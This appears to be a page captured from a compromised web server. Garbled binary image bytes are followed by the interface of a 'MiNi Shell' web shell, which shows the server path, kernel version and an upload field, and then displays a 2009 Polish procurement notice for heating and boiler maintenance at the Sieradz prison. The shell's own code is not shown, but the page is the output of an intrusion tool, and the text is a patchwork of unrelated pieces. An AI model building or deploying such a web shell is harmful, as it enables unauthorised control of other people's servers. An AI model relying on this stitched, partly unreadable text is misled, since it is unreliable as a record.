JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/174585-N-2009.html

<p class="kh_header"><b>Sieradz: Usługi w zakresie nadzoru eksploatacyjnego kotłowni parowej - olejowej oraz węzła cieplnego i przyłączy w poszczególnych budynkach Zakładu Karnego w Sieradzu i Oddziału Zewnętrznego Zakładu Karnego w Sieradzu</b><br>
<b>Numer ogłoszenia: 174585 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Orzechowa 5, 98-200 Sieradz, woj. łódzkie, tel. 043 8270600, faks 043 8270621.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zk_sieradz@sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie nadzoru eksploatacyjnego kotłowni parowej - olejowej oraz węzła cieplnego i przyłączy w poszczególnych budynkach Zakładu Karnego w Sieradzu i Oddziału Zewnętrznego Zakładu Karnego w Sieradzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie nadzoru eksploatacyjnego kotłowni parowej - olejowej oraz węzła cieplnego i przyłączy w poszczególnych budynkach Zakładu Karnego w Sieradzu przy ulicy Orzechowej 5 oraz Oddziału Zewnętrznego Zakładu Karnego w Sieradzu przy ulicy Torowej 2 (CPV 50721000-5). 
W skład usług wchodzi: 
1. Kontrola układu spalinowego: 
- konserwacja, regulacja i kontrola szczelności komina i czopucha, 
- kontrola prawidłowości odprowadzania spalin, 
- utrzymanie w sprawności technicznej stanowisk pomiarowych, 
- okresowa elektroniczna analiza spalin. 
2. Kontrola układu paliwowego: 
- konserwacja, regulacja i kontrola układu zasilania palników, 
- konserwacja, regulacja i kontrola szczelności i stanu technicznego baterii zbiorników, 
- czyszczenie i wymiana filtrów olejowych, 
- kontrola stanu technicznego i sprawności wentylacji w pomieszczeniu magazynu paliwa. 
3. Kontrola stacji uzdatniania wody: 
- konserwacja, regulacja i kontrola stanu technicznego stacji uzdatniania, 
- konserwacja, regulacja i kontrola urządzeń dozujących środki chemiczne i uzdatniające, 
- kontrola jakości uzdatnionej wody, 
- konserwacja, regulacja i kontrola urządzenia sterującego stacją uzdatniania. 
4. Kontrola urządzeń zabezpieczających: 
- kontrola, konserwacja i regulacja prezostatów, 
- kontrola, konserwacja i regulacja zaworów bezpieczeństwa,  
- kontrola, konserwacja i regulacja sond zainstalowanych w kotłach i zbiorniku kondensatu, 
- kontrola, konserwacja i regulacja urządzeń zabezpieczających instalację elektryczną, 
- konserwacja, regulacja i kontrola urządzeń sygnalizacji alarmowej. 
5. Kontrola i konserwacja kotłów parowych: 
- konserwacja, regulacja i kontrola stanu technicznego kotłów, 
- konserwacja, regulacja i kontrola stanu technicznego zaworów odmulających, 
- konserwacja, regulacja i kontrola stanu technicznego wodowskazów, 
- konserwacja, czyszczenie i kontrola stanu technicznego płomieniówek 2 razy w roku w miesiącach luty/marzec i październik/listopad. 
6. Kontrola, regulacja i konserwacja palników: 
- konserwacja, regulacja - cztery razy w roku w  miesiącach luty, marzec i październik, listopad oraz kontrola dysz 1 raz w roku, 
- konserwacja, regulacja i kontrola pompy paliwowej, 
- optymalizacja pracy palnika, 
- wymiana filtrów paliwa szt. 2 jeden raz w roku. 
7. Kontrola i konserwacja urządzeń automatyki: 
- konserwacja, regulacja i kontrola urządzeń sterujących pracą kotłów i palników, 
- konserwacja, regulacja i kontrola urządzeń kontrolujących czas pracy kotłów. 
8. Kontrola i konserwacja wewnętrznej sieci parowej: 
- konserwacja, regulacja i kontrola rozdzielacza parowego 1 raz w roku - czerwiec, 
- konserwacja, regulacja i kontrola zaworów parowych 1 raz w roku - czerwiec, 
- konserwacja, regulacja i kontrola manometrów i termometrów 1 raz w roku - czerwiec. 
9. Warunki wykonywania czynności serwisowych: 
- częstotliwość wykonywania bieżących przeglądów określa się na nie rzadziej niż raz w ciągu czternastu dni. Bieżące czynności serwisowe muszą być wykonywane w godzinach pracy administracji Zakładu Karnego w Sieradzu (tj. od poniedziałku do piątku pomiędzy godzinami 8:00, a 16:00),  
- serwisant musi zapewnić całodobowy kontakt telefoniczny, 
- w przypadku awarii serwisowanych urządzeń czas przybycia serwisanta do Zakładu Karnego w Sieradzu nie możne przekraczać 3 godzin od chwili powiadomienia go przez użytkownika. 
10. Przegląd i konserwacja węzła (w tym filtrów). 
11. Przegląd sprawności systemu automatyki. 
12. Sprawdzanie prawidłowości działania zabezpieczeń ciśnieniowych węzła takich jak Reflex, zawór różnicy ciśnień. 
13. Sprawdzanie działania zaworów bezpieczeństwa. 
14. Kontrola szczelności układu hydraulicznego węzła. 
15. Zmiana nastawienia programu pracy węzła (na pisemny wniosek Zamawiającego). 
16. Kontrola przepływu i zużycia ciepła. 
17. Bezpłatne usuwanie drobnych beznakładowych awarii w węźle. 
18. Przegląd i konserwacja urządzeń przyłączy w poszczególnych budynkach. 
19. Regulacja zaworów dokładnej regulacji w węzłach rozdzielających w poszczególnych budynkach. 
20. Kontrola i ustawienie pomp (nastawa ciśnień i przepływów wg analizy poszczególnych obiegów). 
21. Płukanie wymienników ciepła w węźle - (wymienniki centralnego ogrzewania i ciepłej wody): 
- płukanie chemiczne jeden raz w roku wymiennika ciepłej wody - czerwiec, 
- płukanie chemiczne raz na 3 lata wymienników centralnego ogrzewania szt. 5 (rok 2010 - płukanie 2 szt. wymienników w obiegu nr 1, rok 2011 - płukanie 1 szt. wymiennika w obiegu nr 2, rok 2012 - płukanie 2 szt. wymienników w obiegu nr 3).  Płukanie chemiczne wymienników nastąpi każdorazowo po zakończeniu sezonu grzewczego środkami chemicznymi zakupionymi przez Zamawiającego. 
22. Konserwacja węzłów przyłączeniowych do budynków szt. 11 z czyszczeniem wkładów filtracyjnych dwa raz w roku, w miesiącach luty, listopad. 
23. Nadzór eksploatacyjny kotłowni węglowej w Oddziale Zewnętrznym Zakładu Karnego:
- regulacja parametrów pracy kotłów, 
- regulacja parametrów pomp obiegowych C.O. i C.W.U., 
- czyszczenie wkładów filtrów C.O. w kotłowni i węzłach przyłączeniowych do budynków 2 razy w roku, w miesiącach luty, listopad, 
- konserwacja układu pomiarowego energii cieplnej. 
24. Inne: 
- okresowa kontrola urządzeń podlegających dozorowi technicznemu, 
- przygotowanie kotłowni do rewizji przeprowadzanej przez dozór techniczny oraz uczestniczenie w ww. badaniach, 
- kontrola i konserwacja urządzeń wodno-sanitarnych w budynku kotłowni, 
- konserwacja i kontrola urządzeń p.poż., 
- prowadzenie stosownej dokumentacji w zakresie obsługi, konserwacji i eksploatacji urządzeń pracujących w kotłowni, 
- informowanie właściciela o stanie technicznym urządzeń oraz o zakresie przeprowadzonych czynności, 
- wykonywanie wszystkich innych czynności nie objętych niniejszym wykazem,
a wynikających z zaleceń określonych przez producenta poszczególnych urządzeń
w dokumentacji technicznej.

Wszystkie prace należy wykonać zgodnie z Dokumentacją Techniczno Ruchową (DTR) producenta oraz obowiązującymi przepisami..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.72.10.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy: 
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do 	udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz wykaz osób (co najmniej jedna osoba) posiadających ważne świadectwa kwalifikacyjne D i E grupy pierwszej i drugiej w zakresie: obsługi, konserwacji, remontów, montażu i kontrolno-pomiarowym, zgodnie z Załącznikiem nr 1 do Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.), którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, a także dokumenty stwierdzające, że osoby/osoba, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia. 

3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 

4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu wymagań, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz potwierdzi dodatkowo składając aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Ponadto każdy wykonawca ma załączyć do oferty aktualną informację
z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, a w przypadku podmiotów zbiorowych również w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Podstawą ustalenia czy dany podmiot jest podmiotem zbiorowym są przepisy ustawy z dnia 28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. Nr 197, poz. 1661 z późn. zm.). Z grona podmiotów zbiorowych wyłączone są osoby fizyczne oraz spółki cywilne, których wspólnikami są osoby fizyczne. Natomiast podmiotami zbiorowymi są m.in. spółki prawa handlowego, w tym również spółki jawne. 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentów składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
- nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), 
- nie zalega z uiszczaniem podatków, opłat składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert), 
- w przypadku podmiotu zbiorowego nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
Ponadto składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed 	upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Termin ważności oświadczenia jest taki sam jak termin ważności dokumentu, który zastępuje.

Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez wykonawcę dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo	zamówień publicznych, stanowiące Załącznik nr 2 do niniejszej Specyfikacji (w przypadku	wykonawców wspólnie ubiegających się o udzielenie zamówienia, w tym w przypadku	spółki cywilnej, składa każdy wykonawca, biorąc pod uwagę łączny potencjał techniczny
	i kadrowy, łączną wiedzę i doświadczenie oraz sytuację ekonomiczną i finansową	konsorcjum i własne uprawnienia oraz prawo do udziału w postępowaniu); 
2)wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, stanowiący Załącznik
	nr 4 do niniejszej Specyfikacji; 
3)jeżeli w wykazie stanowiącym załącznik nr 4 do niniejszej Specyfikacji wykonawca wskaże	osoby udostępnione przez inne podmioty, pisemne zobowiązania innych podmiotów do	udostępnienia osób zdolnych do wykonania zamówienia; 
4)ważne świadectwa kwalifikacyjne D i E grupy pierwszej i drugiej w zakresie: obsługi,	konserwacji, remontów, montażu i kontrolno-pomiarowym, zgodnie z Załącznikiem nr 1 do	Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r.
	w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące 	się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.) osób,	którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć
	w wykonywaniu zamówienia; 
5)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji	działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub	zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy 	przed upływem terminu składania ofert (w przypadku wykonawców wspólnie ubiegających	się o udzielenie zamówienia, w tym w przypadku spółki cywilnej, składa każdy	wykonawca); 
6)aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego	oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia	Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem	podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub	zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
	na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego	organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert	(w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, w tym
	w przypadku spółki cywilnej, składa każdy wykonawca); 
7)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1	pkt 4-8 ustawy Prawo zamówień publicznych, a w przypadku podmiotów zbiorowych
	ponadto w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych,	wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Sieradzu, 98-200 Sieradz, ul. Orzechowa 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 09:30, miejsce: Zakład Karny w Sieradzu, 98-200 Sieradz, ul. Orzechowa 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com